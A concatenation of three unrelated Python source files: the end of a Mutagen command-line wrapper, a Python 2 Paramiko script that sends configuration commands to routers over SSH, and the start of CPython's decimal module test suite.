stack[-1][key] = value
previous_key = key
else:
value = line
stack_size = value.count('\t') + 1
value = value.strip()
if value == '':
continue
if stack_size == len(stack) + 1:
current_object = []
if stack[-1][previous_key]:
raise WrapperRunException("Invalid structure for mutagen output", result=result)
stack[-1][previous_key] = current_object
stack.append(current_object)
else:
stack = stack[:stack_size]
if isinstance(current_object, list):
current_object.append(value)
else:
raise WrapperRunException("Invalid structure for mutagen output", result=result)
return sessions
class ProcessWrapper:
STDIN = 0
STDOUT = 1
STDERR = 2
def run(self, command, print_output=False, print_output_if_idle=5000):
logging.debug('Running command: %s' % shlex.quote(' '.join(command)))
process = subprocess.Popen(command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
def enqueue_output(process, out, type, queue):
while True:
data = out.read(1)
if data:
queue.put((type, data))
if process.poll() is not None:
data = out.read()
if data:
queue.put((type, data))
out.close()
break
def listen_stdin(queue):
while True:
data = sys.stdin.read(1)
if data:
queue.put((ProcessWrapper.STDIN, data.encode(sys.stdin.encoding)))
if process.poll() is not None:
data = sys.stdin.read()
if data:
queue.put((ProcessWrapper.STDIN, data))
break
queue = Queue()
thread = Thread(target=enqueue_output, args=(process, process.stdout, ProcessWrapper.STDOUT, queue))
thread.daemon = True
thread.start()
stderr_thread = Thread(target=enqueue_output, args=(process, process.stderr, ProcessWrapper.STDERR, queue))
stderr_thread.daemon = True
stderr_thread.start()
stdin_thread = Thread(target=listen_stdin, args=(queue,))
stdin_thread.daemon = True
stdin_thread_started = False
# read line without blocking
stdout = b''
stderr = b''
stdin = b''
recorded = []
last_read_time = int(round(time.time() * 1000))
while True:
stream, data = (None, None)
try:
stream, data = queue.get_nowait()
if stream == ProcessWrapper.STDERR or stream == ProcessWrapper.STDOUT:
recorded.append((stream, data))
last_read_time = int(round(time.time() * 1000))
except Empty:
if process.stdout.closed and process.stderr.closed:
if queue.qsize() == 0:
break
else:
if recorded and int(round(time.time() * 1000)) - last_read_time > print_output_if_idle:
logging.warning("The following mutagen command seems to require your input: ")
logging.warning(shlex.quote(' '.join(command))[1:-1])
logging.warning("Please enter your input if required, or kindly wait for it to terminate.")
print_output = True
for stream, data in recorded:
if stream == ProcessWrapper.STDOUT:
sys.stdout.buffer.write(data)
sys.stdout.flush()
elif stream == ProcessWrapper.STDERR:
sys.stderr.buffer.write(data)
sys.stderr.flush()
if not stdin_thread_started:
stdin_thread_started = True
stdin_thread.start()
recorded = []
continue
if stream == ProcessWrapper.STDOUT:
stdout = stdout + data
if print_output:
sys.stdout.buffer.write(data)
elif stream == ProcessWrapper.STDERR:
stderr = stderr + data
if print_output:
sys.stderr.buffer.write(data)
elif stream == ProcessWrapper.STDIN:
stdin = stdin + data
process.stdin.write(data)
process.stdin.flush()
return subprocess.CompletedProcess(process.args, process.returncode,
str(stdout, encoding=sys.stdout.encoding),
str(stderr, encoding=sys.stdout.encoding)
)
class MutagenWrapper(ProcessWrapper):
def __init__(self, mutagen="mutagen.exe" if os.name == 'nt' else "mutagen"):
self.mutagen = mutagen
self.list_parser = MutagenListParser()
def run(self, command, print_output=False, print_output_on_idle=5000):
"""
result = subprocess.run([self.mutagen] + command,
encoding=sys.stdout.encoding,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
"""
result = super().run([self.mutagen] + command, print_output, print_output_on_idle)
if result.returncode == 1 and 'unable to connect to daemon' in result.stderr:
raise DaemonNotRunningException("Mutagen daemon doesn't seems to run. "
"Start the daemon with \"mutagen daemon start\" command and try again.",
result=result)
if result.returncode != 0:
raise MutagenRunException("Mutagen has failed to execute a command: " +
(shlex.quote(' '.join([self.mutagen] + command))[1:-1]) +
(os.linesep + result.stdout if result.stdout else '') +
(os.linesep + result.stderr if result.stderr else ''),
result=result)
return result
def create(self, alpha, beta, options=None):
"""
Creates a new session
:param alpha:
:param beta:
:param options:
:return:
"""
if isinstance(options, dict):
options_list = []
for k, v in options.items():
if v:
if isinstance(v, list):
for item in v:
options_list.append('--' + str(k))
options_list.append(str(item))
else:
options_list.append('--' + str(k))
if not isinstance(v, bool):
options_list.append(str(v))
options = options_list
elif isinstance(options, str):
options = shlex.split(options)
command = ['sync', 'create', alpha, beta] + (list(options) if options else [])
result = self.run(command)
ret = result.stdout
match = re.search('Created session\\s(.*?)\\s', ret)
if match:
return match.group(1)
raise WrapperException("Invalid response: " + ret)
def terminate(self, session_id=None, label_selector=None, one=False):
result = self._session_control('terminate', session_id, label_selector)
ret = result.stdout
session_ids = re.findall('Terminating session\\s(.*?)\\.', ret)
return self._handle_result(result, session_ids, one)
def flush(self, session_id=None, label_selector=None, one=False):
result = self._session_control('flush', session_id, label_selector)
ret = result.stdout
session_ids = re.findall('for session\\s(.*?)\\.', ret)
return self._handle_result(result, session_ids, one)
def pause(self, session_id=None, label_selector=None, one=False):
result = self._session_control('pause', session_id, label_selector)
ret = result.stdout
session_ids = re.findall('Pausing session\\s(.*?)\\.', ret)
return self._handle_result(result, session_ids, one)
def resume(self, session_id=None, label_selector=None, one=False):
result = self._session_control('resume', session_id, label_selector)
ret = result.stdout
session_ids = re.findall('Resuming session\\s(.*?)\\.', ret)
return self._handle_result(result, session_ids, one)
def _session_control(self, command, session_id, label_selector):
args = ['sync', command]
if session_id:
args.append(session_id)
elif label_selector:
args.append('--label-selector')
args.append(label_selector)
else:
args.append('--all')
return self.run(args)
def list(self, session_id=None, label_selector=None, long=False, one=False):
try:
args = ['sync', 'list']
if session_id:
args.append(session_id)
if label_selector:
args.append('--label-selector')
args.append(label_selector)
if long:
args.append('--long')
result = self.run(args)
except MutagenRunException as e:
if 'unable to locate requested sessions' in e.result.stderr:
return []
raise
parsed = self.list_parser.parse(result.stdout, result)
return self._handle_result(result, parsed, one)
def _handle_result(self, result, items, one):
if one:
if len(items) > 1:
raise MultipleSessionsException(result)
elif len(items) == 1:
return items[0]
else:
return None
return items
|
SSH-Config-Final.py | import paramiko
import threading
import os.path
import subprocess
import time
import sys
import re
#Checking IP address file and content validity
def ip_is_valid():
check = False
global ip_list
while True:
#Prompting user for input
print "\n# # # # # # # # # # # # # # # # # # # # # # # # # # # #\n"
ip_file = raw_input("# Enter IP file name and extension: ")
print "\n# # # # # # # # # # # # # # # # # # # # # # # # # # # #"
#Changing exception message
try:
#Open user selected file for reading (IP addresses file)
selected_ip_file = open(ip_file, 'r')
#Starting from the beginning of the file
selected_ip_file.seek(0)
#Reading each line (IP address) in the file
ip_list = selected_ip_file.readlines()
#Closing the file
selected_ip_file.close()
except IOError:
print "\n* File %s does not exist! Please check and try again!\n" % ip_file
#Checking octets
for ip in ip_list:
a = ip.split('.')
if (len(a) == 4) and (1 <= int(a[0]) <= 223) and (int(a[0]) != 127) and (int(a[0]) != 169 or int(a[1]) != 254) and (0 <= int(a[1]) <= 255 and 0 <= int(a[2]) <= 255 and 0 <= int(a[3]) <= 255):
check = True
break
else:
print '\n* There was an INVALID IP address! Please check and try again!\n'
check = False
continue
#Evaluating the 'check' flag
if check == False:
continue
elif check == True:
break
#Checking IP reachability
print "\n* Checking IP reachability. Please wait...\n"
check2 = False
while True:
for ip in ip_list:
ping_reply = subprocess.call(['ping', '-c', '2', '-w', '2', '-q', '-n', ip])
if ping_reply == 0:
check2 = True
continue
elif ping_reply == 2:
print "\n* No response from device %s." % ip
check2 = False
break
else:
print "\n* Ping to the following device has FAILED:", ip
check2 = False
break
#Evaluating the 'check' flag
if check2 == False:
print "* Please re-check IP address list or device.\n"
ip_is_valid()
elif check2 == True:
print '\n* All devices are reachable. Waiting for username/password file...\n'
break
#Checking user file validity
def user_is_valid():
global user_file
while True:
print "# # # # # # # # # # # # # # # # # # # # # # # # # # # #\n"
user_file = raw_input("# Enter user/pass file name and extension: ")
print "\n# # # # # # # # # # # # # # # # # # # # # # # # # # # #"
#Changing output messages
if os.path.isfile(user_file) == True:
print "\n* Username/password file has been validated. Waiting for command file...\n"
break
else:
print "\n* File %s does not exist! Please check and try again!\n" % user_file
continue
#Checking command file validity
def cmd_is_valid():
global cmd_file
while True:
print "\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # #\n"
cmd_file = raw_input("# Enter command file name and extension: ")
print "\n# # # # # # # # # # # # # # # # # # # # # # # # # # # #"
#Changing output messages
if os.path.isfile(cmd_file) == True:
print "\n* Sending command(s) to device(s)...\n"
break
else:
print "\n* File %s does not exist! Please check and try again!\n" % cmd_file
continue
#Change exception message
try:
#Calling IP validity function
ip_is_valid()
except KeyboardInterrupt:
print "\n\n* Program aborted by user. Exiting...\n"
sys.exit()
#Change exception message
try:
#Calling user file validity function
user_is_valid()
except KeyboardInterrupt:
print "\n\n* Program aborted by user. Exiting...\n"
sys.exit()
#Change exception message
try:
#Calling command file validity function
cmd_is_valid()
except KeyboardInterrupt:
print "\n\n* Program aborted by user. Exiting...\n"
sys.exit()
#Open SSHv2 connection to devices
def open_ssh_conn(ip):
#Change exception message
try:
#Define SSH parameters
selected_user_file = open(user_file, 'r')
#Starting from the beginning of the file
selected_user_file.seek(0)
#Reading the username from the file
username = selected_user_file.readlines()[0].split(',')[0]
#Starting from the beginning of the file
selected_user_file.seek(0)
#Reading the password from the file
password = selected_user_file.readlines()[0].split(',')[1].rstrip("\n")
#Logging into device
session = paramiko.SSHClient()
#For testing purposes, this allows auto-accepting unknown host keys
#Do not use in production! The default would be RejectPolicy
session.set_missing_host_key_policy(paramiko.AutoAddPolicy())
#Connect to the device using username and password
session.connect(ip, username = username, password = password)
#Start an interactive shell session on the router
connection = session.invoke_shell()
#Setting terminal length for entire output - disable pagination
connection.send("terminal length 0\n")
time.sleep(1)
#Entering global config mode
connection.send("\n")
connection.send("configure terminal\n")
time.sleep(1)
#Open user selected file for reading
selected_cmd_file = open(cmd_file, 'r')
#Starting from the beginning of the file
selected_cmd_file.seek(0)
#Writing each line in the file to the device
for each_line in selected_cmd_file.readlines():
connection.send(each_line + '\n')
time.sleep(2)
#Closing the user file
selected_user_file.close()
#Closing the command file
selected_cmd_file.close()
#Checking command output for IOS syntax errors
router_output = connection.recv(65535)
if re.search(r"% Invalid input detected at", router_output):
print "* There was at least one IOS syntax error on device %s" % ip
else:
print "\nDONE for device %s" % ip
#Test for reading command output
#print router_output + "\n"
#Closing the connection
session.close()
except paramiko.AuthenticationException:
print "* Invalid username or password. \n* Please check the username/password file or the device configuration!"
print "* Closing program...\n"
#Creating threads
def create_threads():
threads = []
for ip in ip_list:
th = threading.Thread(target = open_ssh_conn, args = (ip,)) #args is a tuple with a single element
th.start()
threads.append(th)
for th in threads:
th.join()
#Calling threads creation function
create_threads()
#End of program
|
test_decimal.py | # Copyright (c) 2004 Python Software Foundation.
# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# and Facundo Batista <facundo at taniquetil.com.ar>
# and Raymond Hettinger <python at rcn.com>
# and Aahz (aahz at pobox.com)
# and Tim Peters
"""
These are the test cases for the Decimal module.
There are two groups of tests, Arithmetic and Behaviour. The former test
the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter
test the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
http://speleotrove.com/decimal/dectest.zip
This test module can be called from command line with one parameter (Arithmetic
or Behaviour) to test each part, or without parameter to test both parts. If
you're working through IDLE, you can import this test module and call test_main()
with the corresponding argument.
"""
import math
import os, sys
import operator
import warnings
import pickle, copy
import unittest
import numbers
import locale
from test.support import (run_unittest, run_doctest, is_resource_enabled,
requires_IEEE_754, requires_docstrings)
from test.support import (import_fresh_module, TestFailed,
run_with_locale, cpython_only)
import random
import inspect
import threading
C = import_fresh_module('decimal', fresh=['_decimal'])
P = import_fresh_module('decimal', blocked=['_decimal'])
orig_sys_decimal = sys.modules['decimal']
# fractions module must import the correct decimal module.
cfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = P
pfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = C
fractions = {C:cfractions, P:pfractions}
sys.modules['decimal'] = orig_sys_decimal
# Useful Test Constant
Signals = {
C: tuple(C.getcontext().flags.keys()) if C else None,
P: tuple(P.getcontext().flags.keys())
}
# Signals ordered with respect to precedence: when an operation
# produces multiple signals, signals occurring later in the list
# should be handled before those occurring earlier in the list.
OrderedSignals = {
C: [C.Clamped, C.Rounded, C.Inexact, C.Subnormal, C.Underflow,
C.Overflow, C.DivisionByZero, C.InvalidOperation,
C.FloatOperation] if C else None,
P: [P.Clamped, P.Rounded, P.Inexact, P.Subnormal, P.Underflow,
P.Overflow, P.DivisionByZero, P.InvalidOperation,
P.FloatOperation]
}
def assert_signals(cls, context, attr, expected):
d = getattr(context, attr)
cls.assertTrue(all(d[s] if s in expected else not d[s] for s in d))
ROUND_UP = P.ROUND_UP
ROUND_DOWN = P.ROUND_DOWN
ROUND_CEILING = P.ROUND_CEILING
ROUND_FLOOR = P.ROUND_FLOOR
ROUND_HALF_UP = P.ROUND_HALF_UP
ROUND_HALF_DOWN = P.ROUND_HALF_DOWN
ROUND_HALF_EVEN = P.ROUND_HALF_EVEN
ROUND_05UP = P.ROUND_05UP
RoundingModes = [
ROUND_UP, ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR,
ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN,
ROUND_05UP
]
# Tests are built around these assumed context defaults.
# test_main() restores the original context.
ORIGINAL_CONTEXT = {
C: C.getcontext().copy() if C else None,
P: P.getcontext().copy()
}
def init(m):
if not m: return
DefaultTestContext = m.Context(
prec=9, rounding=ROUND_HALF_EVEN, traps=dict.fromkeys(Signals[m], 0)
)
m.setcontext(DefaultTestContext)
TESTDATADIR = 'decimaltestdata'
if __name__ == '__main__':
file = sys.argv[0]
else:
file = __file__
testdir = os.path.dirname(file) or os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep
skip_expected = not os.path.isdir(directory)
# Make sure it actually raises errors when not expected and caught in flags
# Slower, since it runs some things several times.
EXTENDEDERRORTEST = False
# Test extra functionality in the C version (-DEXTRA_FUNCTIONALITY).
EXTRA_FUNCTIONALITY = True if hasattr(C, 'DecClamped') else False
requires_extra_functionality = unittest.skipUnless(
EXTRA_FUNCTIONALITY, "test requires build with -DEXTRA_FUNCTIONALITY")
skip_if_extra_functionality = unittest.skipIf(
EXTRA_FUNCTIONALITY, "test requires regular build")
class IBMTestCases(unittest.TestCase):
"""Class which tests the Decimal class against the IBM test cases."""
def setUp(self):
self.context = self.decimal.Context()
self.readcontext = self.decimal.Context()
self.ignore_list = ['#']
# List of individual .decTest test ids that correspond to tests that
# we're skipping for one reason or another.
self.skipped_test_ids = set([
# Skip implementation-specific scaleb tests.
'scbx164',
'scbx165',
# For some operations (currently exp, ln, log10, power), the decNumber
# reference implementation imposes additional restrictions on the context
# and operands. These restrictions are not part of the specification;
# however, the effect of these restrictions does show up in some of the
# testcases. We skip testcases that violate these restrictions, since
# Decimal behaves differently from decNumber for these testcases so these
# testcases would otherwise fail.
'expx901',
'expx902',
'expx903',
'expx905',
'lnx901',
'lnx902',
'lnx903',
'lnx905',
'logx901',
'logx902',
'logx903',
'logx905',
'powx1183',
'powx1184',
'powx4001',
'powx4002',
'powx4003',
'powx4005',
'powx4008',
'powx4010',
'powx4012',
'powx4014',
])
if self.decimal == C:
# status has additional Subnormal, Underflow
self.skipped_test_ids.add('pwsx803')
self.skipped_test_ids.add('pwsx805')
# Correct rounding (skipped for decNumber, too)
self.skipped_test_ids.add('powx4302')
self.skipped_test_ids.add('powx4303')
self.skipped_test_ids.add('powx4342')
self.skipped_test_ids.add('powx4343')
# http://bugs.python.org/issue7049
self.skipped_test_ids.add('pwmx325')
self.skipped_test_ids.add('pwmx326')
# Map test directives to setter functions.
self.ChangeDict = {'precision' : self.change_precision,
'rounding' : self.change_rounding_method,
'maxexponent' : self.change_max_exponent,
'minexponent' : self.change_min_exponent,
'clamp' : self.change_clamp}
# Name adapter to be able to change the Decimal and Context
# interface without changing the test files from Cowlishaw.
self.NameAdapter = {'and':'logical_and',
'apply':'_apply',
'class':'number_class',
'comparesig':'compare_signal',
'comparetotal':'compare_total',
'comparetotmag':'compare_total_mag',
'copy':'copy_decimal',
'copyabs':'copy_abs',
'copynegate':'copy_negate',
'copysign':'copy_sign',
'divideint':'divide_int',
'invert':'logical_invert',
'iscanonical':'is_canonical',
'isfinite':'is_finite',
'isinfinite':'is_infinite',
'isnan':'is_nan',
'isnormal':'is_normal',
'isqnan':'is_qnan',
'issigned':'is_signed',
'issnan':'is_snan',
'issubnormal':'is_subnormal',
'iszero':'is_zero',
'maxmag':'max_mag',
'minmag':'min_mag',
'nextminus':'next_minus',
'nextplus':'next_plus',
'nexttoward':'next_toward',
'or':'logical_or',
'reduce':'normalize',
'remaindernear':'remainder_near',
'samequantum':'same_quantum',
'squareroot':'sqrt',
'toeng':'to_eng_string',
'tointegral':'to_integral_value',
'tointegralx':'to_integral_exact',
'tosci':'to_sci_string',
'xor':'logical_xor'}
# Map test-case names to roundings.
self.RoundingDict = {'ceiling' : ROUND_CEILING,
'down' : ROUND_DOWN,
'floor' : ROUND_FLOOR,
'half_down' : ROUND_HALF_DOWN,
'half_even' : ROUND_HALF_EVEN,
'half_up' : ROUND_HALF_UP,
'up' : ROUND_UP,
'05up' : ROUND_05UP}
# Map the test cases' error names to the actual errors.
self.ErrorNames = {'clamped' : self.decimal.Clamped,
'conversion_syntax' : self.decimal.InvalidOperation,
'division_by_zero' : self.decimal.DivisionByZero,
'division_impossible' : self.decimal.InvalidOperation,
'division_undefined' : self.decimal.InvalidOperation,
'inexact' : self.decimal.Inexact,
'invalid_context' : self.decimal.InvalidOperation,
'invalid_operation' : self.decimal.InvalidOperation,
'overflow' : self.decimal.Overflow,
'rounded' : self.decimal.Rounded,
'subnormal' : self.decimal.Subnormal,
'underflow' : self.decimal.Underflow}
# The following functions return True/False rather than a
# Decimal instance.
self.LogicalFunctions = ('is_canonical',
'is_finite',
'is_infinite',
'is_nan',
'is_normal',
'is_qnan',
'is_signed',
'is_snan',
'is_subnormal',
'is_zero',
'same_quantum')
def read_unlimited(self, v, context):
"""Work around the limitations of the 32-bit _decimal version. The
guaranteed maximum values for prec, Emax etc. are 425000000,
but higher values usually work, except for rare corner cases.
In particular, all of the IBM tests pass with maximum values
of 1070000000."""
if self.decimal == C and self.decimal.MAX_EMAX == 425000000:
self.readcontext._unsafe_setprec(1070000000)
self.readcontext._unsafe_setemax(1070000000)
self.readcontext._unsafe_setemin(-1070000000)
return self.readcontext.create_decimal(v)
else:
return self.decimal.Decimal(v, context)
def eval_file(self, file):
global skip_expected
if skip_expected:
raise unittest.SkipTest
with open(file) as f:
for line in f:
line = line.replace('\r\n', '').replace('\n', '')
#print line
try:
t = self.eval_line(line)
except self.decimal.DecimalException as exception:
#Exception raised where there shouldn't have been one.
self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line)
def eval_line(self, s):
if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith(' --'):
s = (s.split('->')[0] + '->' +
s.split('->')[1].split('--')[0]).strip()
else:
s = s.split('--')[0].strip()
for ignore in self.ignore_list:
if s.find(ignore) >= 0:
#print s.split()[0], 'NotImplemented--', ignore
return
if not s:
return
elif ':' in s:
return self.eval_directive(s)
else:
return self.eval_equation(s)
def eval_directive(self, s):
funct, value = (x.strip().lower() for x in s.split(':'))
if funct == 'rounding':
value = self.RoundingDict[value]
else:
try:
value = int(value)
except ValueError:
pass
funct = self.ChangeDict.get(funct, (lambda *args: None))
funct(value)
def eval_equation(self, s):
if not TEST_ALL and random.random() < 0.90:
return
self.context.clear_flags()
try:
Sides = s.split('->')
L = Sides[0].strip().split()
id = L[0]
if DEBUG:
print("Test ", id, end=" ")
funct = L[1].lower()
valstemp = L[2:]
L = Sides[1].strip().split()
ans = L[0]
exceptions = L[1:]
except (TypeError, AttributeError, IndexError):
raise self.decimal.InvalidOperation
def FixQuotes(val):
val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
val = val.replace("'", '').replace('"', '')
val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
return val
if id in self.skipped_test_ids:
return
fname = self.NameAdapter.get(funct, funct)
if fname == 'rescale':
return
funct = getattr(self.context, fname)
vals = []
conglomerate = ''
quote = 0
theirexceptions = [self.ErrorNames[x.lower()] for x in exceptions]
for exception in Signals[self.decimal]:
self.context.traps[exception] = 1 #Catch these bugs...
for exception in theirexceptions:
self.context.traps[exception] = 0
for i, val in enumerate(valstemp):
if val.count("'") % 2 == 1:
quote = 1 - quote
if quote:
conglomerate = conglomerate + ' ' + val
continue
else:
val = conglomerate + val
conglomerate = ''
v = FixQuotes(val)
if fname in ('to_sci_string', 'to_eng_string'):
if EXTENDEDERRORTEST:
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(self.context.create_decimal(v))
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
v = self.context.create_decimal(v)
else:
v = self.read_unlimited(v, self.context)
vals.append(v)
ans = FixQuotes(ans)
if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'):
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
# as above, but add traps cumulatively, to check precedence
ordered_errors = [e for e in OrderedSignals[self.decimal] if e in theirexceptions]
for error in ordered_errors:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s; expected %s" %
(type(e), s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
# reset traps
for error in ordered_errors:
self.context.traps[error] = 0
if DEBUG:
print("--", self.context)
try:
result = str(funct(*vals))
if fname in self.LogicalFunctions:
result = str(int(eval(result))) # 'True', 'False' -> '1', '0'
except Signals[self.decimal] as error:
self.fail("Raised %s in %s" % (error, s))
except: #Catch any error long enough to state the test case.
print("ERROR:", s)
raise
myexceptions = self.getexceptions()
myexceptions.sort(key=repr)
theirexceptions.sort(key=repr)
self.assertEqual(result, ans,
'Incorrect answer for ' + s + ' -- got ' + result)
self.assertEqual(myexceptions, theirexceptions,
'Incorrect flags set in ' + s + ' -- got ' + str(myexceptions))
def getexceptions(self):
return [e for e in Signals[self.decimal] if self.context.flags[e]]
def change_precision(self, prec):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setprec(prec)
else:
self.context.prec = prec
def change_rounding_method(self, rounding):
self.context.rounding = rounding
def change_min_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemin(exp)
else:
self.context.Emin = exp
def change_max_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemax(exp)
else:
self.context.Emax = exp
def change_clamp(self, clamp):
self.context.clamp = clamp
class CIBMTestCases(IBMTestCases):
decimal = C
class PyIBMTestCases(IBMTestCases):
decimal = P
# The following classes test the behaviour of Decimal according to PEP 327
class ExplicitConstructionTest(unittest.TestCase):
'''Unit tests for Explicit Construction cases of Decimal.'''
def test_explicit_empty(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(), Decimal("0"))
def test_explicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, Decimal, None)
def test_explicit_from_int(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
self.assertEqual(str(d), '45')
#very large positive
d = Decimal(500000123)
self.assertEqual(str(d), '500000123')
#negative
d = Decimal(-45)
self.assertEqual(str(d), '-45')
#zero
d = Decimal(0)
self.assertEqual(str(d), '0')
# single word longs
for n in range(0, 32):
for sign in (-1, 1):
for x in range(-5, 5):
i = sign * (2**n + x)
d = Decimal(i)
self.assertEqual(str(d), str(i))
def test_explicit_from_string(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
#empty
self.assertEqual(str(Decimal('')), 'NaN')
#int
self.assertEqual(str(Decimal('45')), '45')
#float
self.assertEqual(str(Decimal('45.34')), '45.34')
#engineer notation
self.assertEqual(str(Decimal('45e2')), '4.5E+3')
#just not a number
self.assertEqual(str(Decimal('ugly')), 'NaN')
#leading and trailing whitespace permitted
self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4')
self.assertEqual(str(Decimal(' -7.89')), '-7.89')
self.assertEqual(str(Decimal(" 3.45679 ")), '3.45679')
# underscores
self.assertEqual(str(Decimal('1_3.3e4_0')), '1.33E+41')
self.assertEqual(str(Decimal('1_0_0_0')), '1000')
# unicode whitespace
for lead in ["", ' ', '\u00a0', '\u205f']:
for trail in ["", ' ', '\u00a0', '\u205f']:
self.assertEqual(str(Decimal(lead + '9.311E+28' + trail)),
'9.311E+28')
with localcontext() as c:
c.traps[InvalidOperation] = True
# Invalid string
self.assertRaises(InvalidOperation, Decimal, "xyz")
# Two arguments max
self.assertRaises(TypeError, Decimal, "1234", "x", "y")
# space within the numeric part
self.assertRaises(InvalidOperation, Decimal, "1\u00a02\u00a03")
self.assertRaises(InvalidOperation, Decimal, "\u00a01\u00a02\u00a0")
# unicode whitespace
self.assertRaises(InvalidOperation, Decimal, "\u00a0")
self.assertRaises(InvalidOperation, Decimal, "\u00a0\u00a0")
# embedded NUL
self.assertRaises(InvalidOperation, Decimal, "12\u00003")
# underscores don't prevent errors
self.assertRaises(InvalidOperation, Decimal, "1_2_\u00003")
@cpython_only
def test_from_legacy_strings(self):
import _testcapi
Decimal = self.decimal.Decimal
context = self.decimal.Context()
s = _testcapi.unicode_legacy_string('9.999999')
self.assertEqual(str(Decimal(s)), '9.999999')
self.assertEqual(str(context.create_decimal(s)), '9.999999')
def test_explicit_from_tuples(self):
Decimal = self.decimal.Decimal
#zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(str(d), '0')
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(str(d), '-45')
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(str(d), '45.34')
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
#inf
d = Decimal( (0, (), "F") )
self.assertEqual(str(d), 'Infinity')
#wrong number of items
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )
#bad sign
self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2))
#bad exp
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') )
#bad coefficients
self.assertRaises(ValueError, Decimal, (1, "xyz", 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) )
def test_explicit_from_list(self):
Decimal = self.decimal.Decimal
d = Decimal([0, [0], 0])
self.assertEqual(str(d), '0')
d = Decimal([1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal([1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal((1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25))
self.assertEqual(str(d), '-4.34913534E-17')
def test_explicit_from_bool(self):
Decimal = self.decimal.Decimal
self.assertIs(bool(Decimal(0)), False)
self.assertIs(bool(Decimal(1)), True)
self.assertEqual(Decimal(False), Decimal(0))
self.assertEqual(Decimal(True), Decimal(1))
def test_explicit_from_Decimal(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
#very large positive
d = Decimal(500000123)
e = Decimal(d)
self.assertEqual(str(e), '500000123')
#negative
d = Decimal(-45)
e = Decimal(d)
self.assertEqual(str(e), '-45')
#zero
d = Decimal(0)
e = Decimal(d)
self.assertEqual(str(e), '0')
@requires_IEEE_754
def test_explicit_from_float(self):
Decimal = self.decimal.Decimal
r = Decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertTrue(Decimal(float('nan')).is_qnan())
self.assertTrue(Decimal(float('inf')).is_infinite())
self.assertTrue(Decimal(float('-inf')).is_infinite())
self.assertEqual(str(Decimal(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(Decimal(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(Decimal(float('-inf'))),
str(Decimal('-Infinity')))
self.assertEqual(str(Decimal(float('-0.0'))),
str(Decimal('-0')))
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(Decimal(x))) # roundtrip
def test_explicit_context_create_decimal(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
Rounded = self.decimal.Rounded
nc = copy.copy(self.decimal.getcontext())
nc.prec = 3
# empty
d = Decimal()
self.assertEqual(str(d), '0')
d = nc.create_decimal()
self.assertEqual(str(d), '0')
# from None
self.assertRaises(TypeError, nc.create_decimal, None)
# from int
